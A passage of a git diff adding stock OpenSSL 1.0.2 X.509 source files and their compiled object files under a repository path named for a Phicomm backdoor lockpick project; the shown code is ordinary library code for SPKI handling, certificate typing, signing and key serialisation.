+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/x509.h>
+
+int NETSCAPE_SPKI_set_pubkey(NETSCAPE_SPKI *x, EVP_PKEY *pkey)
+{
+    if ((x == NULL) || (x->spkac == NULL))
+        return (0);
+    return (X509_PUBKEY_set(&(x->spkac->pubkey), pkey));
+}
+
+EVP_PKEY *NETSCAPE_SPKI_get_pubkey(NETSCAPE_SPKI *x)
+{
+    if ((x == NULL) || (x->spkac == NULL))
+        return (NULL);
+    return (X509_PUBKEY_get(x->spkac->pubkey));
+}
+
+/* Load a Netscape SPKI from a base64 encoded string */
+
+NETSCAPE_SPKI *NETSCAPE_SPKI_b64_decode(const char *str, int len)
+{
+    unsigned char *spki_der;
+    const unsigned char *p;
+    int spki_len;
+    NETSCAPE_SPKI *spki;
+    if (len <= 0)
+        len = strlen(str);
+    if (!(spki_der = OPENSSL_malloc(len + 1))) {
+        X509err(X509_F_NETSCAPE_SPKI_B64_DECODE, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+    spki_len = EVP_DecodeBlock(spki_der, (const unsigned char *)str, len);
+    if (spki_len < 0) {
+        X509err(X509_F_NETSCAPE_SPKI_B64_DECODE, X509_R_BASE64_DECODE_ERROR);
+        OPENSSL_free(spki_der);
+        return NULL;
+    }
+    p = spki_der;
+    spki = d2i_NETSCAPE_SPKI(NULL, &p, spki_len);
+    OPENSSL_free(spki_der);
+    return spki;
+}
+
+/* Generate a base64 encoded string from an SPKI */
+
+char *NETSCAPE_SPKI_b64_encode(NETSCAPE_SPKI *spki)
+{
+    unsigned char *der_spki, *p;
+    char *b64_str;
+    int der_len;
+    der_len = i2d_NETSCAPE_SPKI(spki, NULL);
+    der_spki = OPENSSL_malloc(der_len);
+    b64_str = OPENSSL_malloc(der_len * 2);
+    if (!der_spki || !b64_str) {
+        X509err(X509_F_NETSCAPE_SPKI_B64_ENCODE, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+    p = der_spki;
+    i2d_NETSCAPE_SPKI(spki, &p);
+    EVP_EncodeBlock((unsigned char *)b64_str, der_spki, der_len);
+    OPENSSL_free(der_spki);
+    return b64_str;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509spki.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509spki.o
new file mode 100644
index 0000000000000000000000000000000000000000..31748cc059aed81a556e000175946f24223d41c9
GIT binary patch
literal 3352
zcmbuBO>7%Q6vxMQ(z+tqn(`q-Q1KzD3?wUWnu5xKdi{}X6sxfkJ8Gnstz&PRD2eUb
zYm`7mfhd($sS)Br4;(o506kVHhhV9#svr)aUO6B{L!qQm0ksGL=Dpb&GFjUaf+vmN
z%y0g0X5P%~uFuC4gKn3LaC4DY$WDt>LN4vwsfTGbOeE4te%XKUcWtF^c517~(6|49
zol5N*@9?n>FL<#}O%Gdtswvg_HLWfG<jZNRZ9PE<)vQ>zSE;Q$INzx)Z`6OjqCNa7
zR?XDa>bY*$+6h!tkKi14@JF+5Xe+f!S6rzn8*3_%^|#^Yvq#{E3hqwCtZx(6J<YmF
z+bgxD9$Wlcqgb=Hl`T8$SuOjeW^F2U&FbxDQ*94h*J(9j-PTrNnK|vSy=b%DmMmZQ
zY1W-n>Pht!-2in$c`$7KrKZ&sX6bikNu$<^uo9M(byKx&P#UeC>mzGtce)@|dy<tc
z(+exXyblU_zXMX5cU<|73h(wn0txHkKN%#f?_<`Fnsv_}$J(}ii%k3p>l>Ph`s%gC
zBcY?^;@qs9C1fZXeK`<JPgU|}C2&+eEQk7(mnyWWyxAX;Lj%v*7}i5b8x$Xub|^!~
z)5J|k4VecD+T*q(uGhziYtiTG>e%aj4=y0aJj42)VjfwD)p=hpv}26jMn5R|s_wYt
zzvzicfeURhDdgUe0x`)Sk$e%!I{*@s>Azt5cilshzv_udfs1Xb6ui(Llfv##q#z6s
z;c+aa!Qr#gM()=eIskZ@K1s-V_Pe7zbhmahY<cMJHRF35A=P_ZaN!|liVo`WbQ;Y=
z_B6mpfgBL>;%D<ba6BKUg#k3<N#HmRkLTw(+d{v@^z_k(Iz4Of@3+u@)Pi4W!Pi^x
z&s*@XTktL5nAg*IF~H~@1HXseX$plOe+y28M@~*eL*#foH6B%yaeX{FGOU*kQ!iGg
z=8Pqx4<$w;YC<0!92}3Q^pqM&#C384o>)DZj*P@7QS1mmvlA`~0Xu|KFAnHABU{KB
zBsw;kOpWRbnfdubmc+-#U;(CXluCsXiBBZ;7?nk!bB=4LONK#m{j>V6#S>jGo0;sK
zo}HP~r!%wjP3AQ6bk5oSoFf)ziqlSeCVY#d!Fz?^?f#=~+ZzbM@Lhv<mh%r0f+0Tu
zh4YUQf+2ql3g;UL!JPVAHl`fkVO+l{@FxU*U*MvCAG;?w{*!|Kn85u4A7R{?Z(7ic
z`A)ac=UeDM5V*KMmjy1a=c>T*S?2q&E^sm5TLKsJ#ktUMA3CA%ab$#G$oE6xJOFhx
z+y^Y&23Uo2{(jLMoWDmF9h^V6L@qBan3*Z?X36$5yjC*iGqPzcnnccJ%nXsI%4H&#
z3fMroA}d7B78VwaJV^2d(~#lQ*GDfsYoEzi<YK8%G)m?YgyMk4j6Pk;EEqhK|K|e`
zj$7?~gNK2kZL)K)Teg<h(RV??Jr6?>t;PoYjm6_1Ev)h{4&Dv4Lr{=AzjTMh!$Ki5
z$8tz7a2)f$#w!quWA;N4jn9wk7LCu(eHc2i&i`+4t-{v-0td|VIPQmm^SUTK`7iUI
zgdqI7JLRVt2#AA1o$o)#XQ6`gJLBJC;4&97?~I=Z-t7E8Wx~@e4)+n?yF8wsf3vwU
vB*+f5$kx#T499TB<CxB~2ShHhzbZk;<~o}6o!>0pj{}48?}OcHJgdI}yC@>(

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509type.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509type.c
new file mode 100644
index 0000000..0331752
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509type.c
@@ -0,0 +1,130 @@
+/* crypto/x509/x509type.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/evp.h>
+#include <openssl/objects.h>
+#include <openssl/x509.h>
+
+int X509_certificate_type(X509 *x, EVP_PKEY *pkey)
+{
+    EVP_PKEY *pk;
+    int ret = 0, i;
+
+    if (x == NULL)
+        return (0);
+
+    if (pkey == NULL)
+        pk = X509_get_pubkey(x);
+    else
+        pk = pkey;
+
+    if (pk == NULL)
+        return (0);
+
+    switch (pk->type) {
+    case EVP_PKEY_RSA:
+        ret = EVP_PK_RSA | EVP_PKT_SIGN;
+/*              if (!sign only extension) */
+        ret |= EVP_PKT_ENC;
+        break;
+    case EVP_PKEY_DSA:
+        ret = EVP_PK_DSA | EVP_PKT_SIGN;
+        break;
+    case EVP_PKEY_EC:
+        ret = EVP_PK_EC | EVP_PKT_SIGN | EVP_PKT_EXCH;
+        break;
+    case EVP_PKEY_DH:
+        ret = EVP_PK_DH | EVP_PKT_EXCH;
+        break;
+    case NID_id_GostR3410_94:
+    case NID_id_GostR3410_2001:
+        ret = EVP_PKT_EXCH | EVP_PKT_SIGN;
+        break;
+    default:
+        break;
+    }
+
+    i = OBJ_obj2nid(x->sig_alg->algorithm);
+    if (i && OBJ_find_sigid_algs(i, NULL, &i)) {
+
+        switch (i) {
+        case NID_rsaEncryption:
+        case NID_rsa:
+            ret |= EVP_PKS_RSA;
+            break;
+        case NID_dsa:
+        case NID_dsa_2:
+            ret |= EVP_PKS_DSA;
+            break;
+        case NID_X9_62_id_ecPublicKey:
+            ret |= EVP_PKS_EC;
+            break;
+        default:
+            break;
+        }
+    }
+
+    /* /8 because it's 1024 bits we look for, not bytes */
+    if (EVP_PKEY_size(pk) <= 1024 / 8)
+        ret |= EVP_PKT_EXP;
+    if (pkey == NULL)
+        EVP_PKEY_free(pk);
+    return (ret);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509type.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509type.o
new file mode 100644
index 0000000000000000000000000000000000000000..8b12bbc50c27e73e38b4bd7aa89443a67ee50094
GIT binary patch
literal 2216
zcmbuA%}*Og6u`&WfYZR@kRBX?+HI5%qQJ_AL=7lZUgL!&u>wj=m8wOnwY|m;V30i<
z;T%e<EtM=cQZAL+dk?wg%7Ft?QZ<MC2UR5w91=NFR7Fj!C>4Egb_W)-zNAl@o%en-
zZ{FK^GrQ|ba<a|mBV2ss3vys_N=Ux_K#wssM!HECdEN8LJ9$n{&D~P1m*K2h3!EK*
zVYQk#6O3-F8+&F@iSE9r1Dme?t5#pD)qm8DH)i*9Ttuz@u5N78ziJARw|W6s4NAw?
zKb5zl%;=yItI;oS;oQvxJQ6*LojQQqppX9oiPD~-i+=QLQ%>#5*6!?dO$n;CD{Og4
zB2fJU0wkkv)cdJ30Y<^TT7wacHMoAlYMi9~R%3#SR-=RV)<w3ic}o8N83_<l51|5)
z>Yb>xVbZVII^*9#66=hHfNuP02KkT*>j$&yh`kxK-F{i?NjOp6`FdXdMxK96rY0uF
z#DTfAS)`^oDvd~yq3Gu(Go#-QN2JK53pR!*1T!HJg<u(`Zp>jG+sNSEnSAW@zI!)`
zZ!P5O>*@?XfUK_q?{~&Vv9Oau=zd#V2>;}l1@Xs#EDTuf2_feH%qI*a1W^{kaUm2J
zf{stC4wnj$zxTYx{hlWXbLH6{_VTm0JIv7Xla8a1@y-_9J8M7NwZkr5VD`H5WP1bb
zG&J1jX1M~ui>oboss+!t;CEZ_A6js-b~!RiE31Z-A-6%*GDe9Oa)pde4GlTbrjj#p
zIjPM|PTo>dT1t*570sTzU{Gz<OfMQ0G84b1t)%Y^7YkXY=L*HFRxT_QvYNiMP$tTk
zv)b%+<tt$Ki~}oIG9ZFhrg~;k%j6feoL*RhRLK}VK=5oHhxUHYmR}KqAjiGu{1HMB
z<lWFXe~S<Vxd4sxUOadp$a|o1e%{5gPMnLNqriP(jT!im%9UlRr=h1MyU%m2WGv|t
zHP$GRvO3j?lrEQvlv!C`Hj2QCE7XwS4i2%mckG3tDXo@PR-p<NBC!>Wyp}8J%f^1l
z|D%ZDjIY>yBVxc%`1!RhdoI_p?}LVW7K7%NS%e@D?2dc{J;vcTDeUlb4sX7}6=&a_
zY5QF>9)uBG^F#gde}HR7pt*&|zvzab^Z2~SbIEo0)Ze_I$J}ec@T-I8$Sn^Yf6)y=
z=ljQT8Wfz`?Elp9#~+$on*HZt(5rqsPW^bDuzu*v{W<rFjqyY$A^ex3;GI1Nt=S)0
hbL{|;O$YvrhD)5~_Q?s*y!;zZ{_NwiKl^B{{sR;I8|?r9

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x_all.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x_all.c
new file mode 100644
index 0000000..0f26c54
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x_all.c
@@ -0,0 +1,558 @@
+/* crypto/x509/x_all.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <openssl/stack.h>
+#include "cryptlib.h"
+#include <openssl/buffer.h>
+#include <openssl/asn1.h>
+#include <openssl/evp.h>
+#include <openssl/x509.h>
+#include <openssl/ocsp.h>
+#ifndef OPENSSL_NO_RSA
+# include <openssl/rsa.h>
+#endif
+#ifndef OPENSSL_NO_DSA
+# include <openssl/dsa.h>
+#endif
+
+int X509_verify(X509 *a, EVP_PKEY *r)
+{
+    if (X509_ALGOR_cmp(a->sig_alg, a->cert_info->signature))
+        return 0;
+    return (ASN1_item_verify(ASN1_ITEM_rptr(X509_CINF), a->sig_alg,
+                             a->signature, a->cert_info, r));
+}
+
+int X509_REQ_verify(X509_REQ *a, EVP_PKEY *r)
+{
+    return (ASN1_item_verify(ASN1_ITEM_rptr(X509_REQ_INFO),
+                             a->sig_alg, a->signature, a->req_info, r));
+}
+
+int NETSCAPE_SPKI_verify(NETSCAPE_SPKI *a, EVP_PKEY *r)
+{
+    return (ASN1_item_verify(ASN1_ITEM_rptr(NETSCAPE_SPKAC),
+                             a->sig_algor, a->signature, a->spkac, r));
+}
+
+int X509_sign(X509 *x, EVP_PKEY *pkey, const EVP_MD *md)
+{
+    x->cert_info->enc.modified = 1;
+    return (ASN1_item_sign(ASN1_ITEM_rptr(X509_CINF), x->cert_info->signature,
+                           x->sig_alg, x->signature, x->cert_info, pkey, md));
+}
+
+int X509_sign_ctx(X509 *x, EVP_MD_CTX *ctx)
+{
+    x->cert_info->enc.modified = 1;
+    return ASN1_item_sign_ctx(ASN1_ITEM_rptr(X509_CINF),
+                              x->cert_info->signature,
+                              x->sig_alg, x->signature, x->cert_info, ctx);
+}
+
+int X509_http_nbio(OCSP_REQ_CTX *rctx, X509 **pcert)
+{
+    return OCSP_REQ_CTX_nbio_d2i(rctx,
+                                 (ASN1_VALUE **)pcert, ASN1_ITEM_rptr(X509));
+}
+
+int X509_REQ_sign(X509_REQ *x, EVP_PKEY *pkey, const EVP_MD *md)
+{
+    return (ASN1_item_sign(ASN1_ITEM_rptr(X509_REQ_INFO), x->sig_alg, NULL,
+                           x->signature, x->req_info, pkey, md));
+}
+
+int X509_REQ_sign_ctx(X509_REQ *x, EVP_MD_CTX *ctx)
+{
+    return ASN1_item_sign_ctx(ASN1_ITEM_rptr(X509_REQ_INFO),
+                              x->sig_alg, NULL, x->signature, x->req_info,
+                              ctx);
+}
+
+int X509_CRL_sign(X509_CRL *x, EVP_PKEY *pkey, const EVP_MD *md)
+{
+    x->crl->enc.modified = 1;
+    return (ASN1_item_sign(ASN1_ITEM_rptr(X509_CRL_INFO), x->crl->sig_alg,
+                           x->sig_alg, x->signature, x->crl, pkey, md));
+}
+
+int X509_CRL_sign_ctx(X509_CRL *x, EVP_MD_CTX *ctx)
+{
+    x->crl->enc.modified = 1;
+    return ASN1_item_sign_ctx(ASN1_ITEM_rptr(X509_CRL_INFO),
+                              x->crl->sig_alg, x->sig_alg, x->signature,
+                              x->crl, ctx);
+}
+
+int X509_CRL_http_nbio(OCSP_REQ_CTX *rctx, X509_CRL **pcrl)
+{
+    return OCSP_REQ_CTX_nbio_d2i(rctx,
+                                 (ASN1_VALUE **)pcrl,
+                                 ASN1_ITEM_rptr(X509_CRL));
+}
+
+int NETSCAPE_SPKI_sign(NETSCAPE_SPKI *x, EVP_PKEY *pkey, const EVP_MD *md)
+{
+    return (ASN1_item_sign(ASN1_ITEM_rptr(NETSCAPE_SPKAC), x->sig_algor, NULL,
+                           x->signature, x->spkac, pkey, md));
+}
+
+#ifndef OPENSSL_NO_FP_API
+X509 *d2i_X509_fp(FILE *fp, X509 **x509)
+{
+    return ASN1_item_d2i_fp(ASN1_ITEM_rptr(X509), fp, x509);
+}
+
+int i2d_X509_fp(FILE *fp, X509 *x509)
+{
+    return ASN1_item_i2d_fp(ASN1_ITEM_rptr(X509), fp, x509);
+}
+#endif
+
+X509 *d2i_X509_bio(BIO *bp, X509 **x509)
+{
+    return ASN1_item_d2i_bio(ASN1_ITEM_rptr(X509), bp, x509);
+}
+
+int i2d_X509_bio(BIO *bp, X509 *x509)
+{
+    return ASN1_item_i2d_bio(ASN1_ITEM_rptr(X509), bp, x509);
+}
+
+#ifndef OPENSSL_NO_FP_API
+X509_CRL *d2i_X509_CRL_fp(FILE *fp, X509_CRL **crl)
+{
+    return ASN1_item_d2i_fp(ASN1_ITEM_rptr(X509_CRL), fp, crl);
+}
+
+int i2d_X509_CRL_fp(FILE *fp, X509_CRL *crl)
+{
+    return ASN1_item_i2d_fp(ASN1_ITEM_rptr(X509_CRL), fp, crl);
+}
+#endif
+
+X509_CRL *d2i_X509_CRL_bio(BIO *bp, X509_CRL **crl)
+{
+    return ASN1_item_d2i_bio(ASN1_ITEM_rptr(X509_CRL), bp, crl);
+}
+
+int i2d_X509_CRL_bio(BIO *bp, X509_CRL *crl)
+{
+    return ASN1_item_i2d_bio(ASN1_ITEM_rptr(X509_CRL), bp, crl);
+}
+
+#ifndef OPENSSL_NO_FP_API
+PKCS7 *d2i_PKCS7_fp(FILE *fp, PKCS7 **p7)
+{
+    return ASN1_item_d2i_fp(ASN1_ITEM_rptr(PKCS7), fp, p7);
+}
+
+int i2d_PKCS7_fp(FILE *fp, PKCS7 *p7)
+{
+    return ASN1_item_i2d_fp(ASN1_ITEM_rptr(PKCS7), fp, p7);
+}
+#endif
+
+PKCS7 *d2i_PKCS7_bio(BIO *bp, PKCS7 **p7)
+{
+    return ASN1_item_d2i_bio(ASN1_ITEM_rptr(PKCS7), bp, p7);
+}
+
+int i2d_PKCS7_bio(BIO *bp, PKCS7 *p7)
+{
+    return ASN1_item_i2d_bio(ASN1_ITEM_rptr(PKCS7), bp, p7);
+}
+
+#ifndef OPENSSL_NO_FP_API
+X509_REQ *d2i_X509_REQ_fp(FILE *fp, X509_REQ **req)
+{
+    return ASN1_item_d2i_fp(ASN1_ITEM_rptr(X509_REQ), fp, req);
+}
+
+int i2d_X509_REQ_fp(FILE *fp, X509_REQ *req)
+{
+    return ASN1_item_i2d_fp(ASN1_ITEM_rptr(X509_REQ), fp, req);
+}
+#endif
+
+X509_REQ *d2i_X509_REQ_bio(BIO *bp, X509_REQ **req)
+{
+    return ASN1_item_d2i_bio(ASN1_ITEM_rptr(X509_REQ), bp, req);
+}
+
+int i2d_X509_REQ_bio(BIO *bp, X509_REQ *req)
+{
+    return ASN1_item_i2d_bio(ASN1_ITEM_rptr(X509_REQ), bp, req);
+}
+
+#ifndef OPENSSL_NO_RSA
+
+# ifndef OPENSSL_NO_FP_API
+RSA *d2i_RSAPrivateKey_fp(FILE *fp, RSA **rsa)
+{
+    return ASN1_item_d2i_fp(ASN1_ITEM_rptr(RSAPrivateKey), fp, rsa);
+}
+
+int i2d_RSAPrivateKey_fp(FILE *fp, RSA *rsa)
+{
+    return ASN1_item_i2d_fp(ASN1_ITEM_rptr(RSAPrivateKey), fp, rsa);
+}
+
+RSA *d2i_RSAPublicKey_fp(FILE *fp, RSA **rsa)
+{
+    return ASN1_item_d2i_fp(ASN1_ITEM_rptr(RSAPublicKey), fp, rsa);
+}
+
+RSA *d2i_RSA_PUBKEY_fp(FILE *fp, RSA **rsa)
+{
+    return ASN1_d2i_fp((void *(*)(void))
+                       RSA_new, (D2I_OF(void)) d2i_RSA_PUBKEY, fp,
+                       (void **)rsa);
+}
+
+int i2d_RSAPublicKey_fp(FILE *fp, RSA *rsa)
+{
+    return ASN1_item_i2d_fp(ASN1_ITEM_rptr(RSAPublicKey), fp, rsa);
+}
+
+int i2d_RSA_PUBKEY_fp(FILE *fp, RSA *rsa)
+{
+    return ASN1_i2d_fp((I2D_OF(void))i2d_RSA_PUBKEY, fp, rsa);
+}
+# endif
+
+RSA *d2i_RSAPrivateKey_bio(BIO *bp, RSA **rsa)
+{
+    return ASN1_item_d2i_bio(ASN1_ITEM_rptr(RSAPrivateKey), bp, rsa);
+}
+
+int i2d_RSAPrivateKey_bio(BIO *bp, RSA *rsa)
+{
+    return ASN1_item_i2d_bio(ASN1_ITEM_rptr(RSAPrivateKey), bp, rsa);
+}
+
+RSA *d2i_RSAPublicKey_bio(BIO *bp, RSA **rsa)
+{
+    return ASN1_item_d2i_bio(ASN1_ITEM_rptr(RSAPublicKey), bp, rsa);
+}
+
+RSA *d2i_RSA_PUBKEY_bio(BIO *bp, RSA **rsa)
+{
+    return ASN1_d2i_bio_of(RSA, RSA_new, d2i_RSA_PUBKEY, bp, rsa);
+}
+
+int i2d_RSAPublicKey_bio(BIO *bp, RSA *rsa)
+{
+    return ASN1_item_i2d_bio(ASN1_ITEM_rptr(RSAPublicKey), bp, rsa);
+}
+
+int i2d_RSA_PUBKEY_bio(BIO *bp, RSA *rsa)
+{
+    return ASN1_i2d_bio_of(RSA, i2d_RSA_PUBKEY, bp, rsa);
+}
+#endif
+
+#ifndef OPENSSL_NO_DSA
+# ifndef OPENSSL_NO_FP_API
+DSA *d2i_DSAPrivateKey_fp(FILE *fp, DSA **dsa)
+{
+    return ASN1_d2i_fp_of(DSA, DSA_new, d2i_DSAPrivateKey, fp, dsa);
+}
+
+int i2d_DSAPrivateKey_fp(FILE *fp, DSA *dsa)
+{
+    return ASN1_i2d_fp_of_const(DSA, i2d_DSAPrivateKey, fp, dsa);
+}
+
+DSA *d2i_DSA_PUBKEY_fp(FILE *fp, DSA **dsa)
+{
+    return ASN1_d2i_fp_of(DSA, DSA_new, d2i_DSA_PUBKEY, fp, dsa);
+}
+
+int i2d_DSA_PUBKEY_fp(FILE *fp, DSA *dsa)
+{
+    return ASN1_i2d_fp_of(DSA, i2d_DSA_PUBKEY, fp, dsa);
+}
+# endif
+
+DSA *d2i_DSAPrivateKey_bio(BIO *bp, DSA **dsa)
+{
+    return ASN1_d2i_bio_of(DSA, DSA_new, d2i_DSAPrivateKey, bp, dsa);
+}
+
+int i2d_DSAPrivateKey_bio(BIO *bp, DSA *dsa)
+{
+    return ASN1_i2d_bio_of_const(DSA, i2d_DSAPrivateKey, bp, dsa);
+}
+
+DSA *d2i_DSA_PUBKEY_bio(BIO *bp, DSA **dsa)
+{
+    return ASN1_d2i_bio_of(DSA, DSA_new, d2i_DSA_PUBKEY, bp, dsa);
+}
+
+int i2d_DSA_PUBKEY_bio(BIO *bp, DSA *dsa)
+{
+    return ASN1_i2d_bio_of(DSA, i2d_DSA_PUBKEY, bp, dsa);
+}
+
+#endif
+
+#ifndef OPENSSL_NO_EC
+# ifndef OPENSSL_NO_FP_API
+EC_KEY *d2i_EC_PUBKEY_fp(FILE *fp, EC_KEY **eckey)
+{
